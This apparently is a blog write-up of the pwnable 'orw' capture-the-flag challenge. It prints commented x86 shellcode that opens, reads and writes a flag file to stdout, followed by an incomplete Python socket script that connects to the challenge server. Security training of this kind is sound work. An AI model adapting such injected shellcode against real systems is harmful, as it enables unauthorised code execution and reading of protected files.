Binary hacking involves exploiting the subtle vulnerabilities in a binary program in order to get it to perform unintended actions. There are many sites online where you can practice binary hacking. One such site I came across was

I attempted the orw challenge which is pretty straight forward and requires you to open,read and write the contents of /home/orw/flag to STDOUT. You can use the nc utility on Linux to connect pwnble server. It connects to a binary with STDIN to input the assembly code which will reveal the contents of the flag. Here the system requires Intel x86 assembly instructions.

 xor  eax, eax	; clear eax
 mov  al, 5		; set eax=5 for 'open' syscall
 xor  ecx, ecx	; clear ecx. Opens file in read only mode
 xor  edx, edx	; clear edx
 push ecx		; push '\0' on the stack
 push 0x67616c66	; push 'galf' on the stack
 push 0x2f77726f	; push '/wro' on the stack
 push 0x2f656d6f	; push '/eom' on the stack
 push 0x682f2f2f	; push 'h///' on the stack
 mov  ebx, esp		; mov esp into ebx
 int  0x80			; invoke syscall
 mov  ebx, eax		; move eax to ebx. eax contains the file descriptor
 mov  ecx, esp		; move esp to ecx. contents of file will be read on to the stack
 xor  edx, edx		; clear edx 
 mov  dl, 0x30		; set edx=48. read up to 48 characters.
 mov  al, 3			; set eax=3 fo read syscall.
 int  0x80			; invoke syscall 
 mov  ebx, 1		; set ebx=1. Sets STDOUT as file descriptor for write call.
 mov  al, 4			; set eax=4 for write syscall
 int  0x80			; invoke syscall

An online assembly tool can be used to obtain the hex code representation. Shell Storm

A simple python script is used to communicate with the challenge server.

import socket

sck = socket.create_connection(('', 10001))
_ = sck.recv(4096)



The output contains the flag as follows

Give my your shellcode:
('length', 54)

In summary the binary opens an STDIN which can be used to inject assembly code. The assembly code performs the open,read and write syscalls.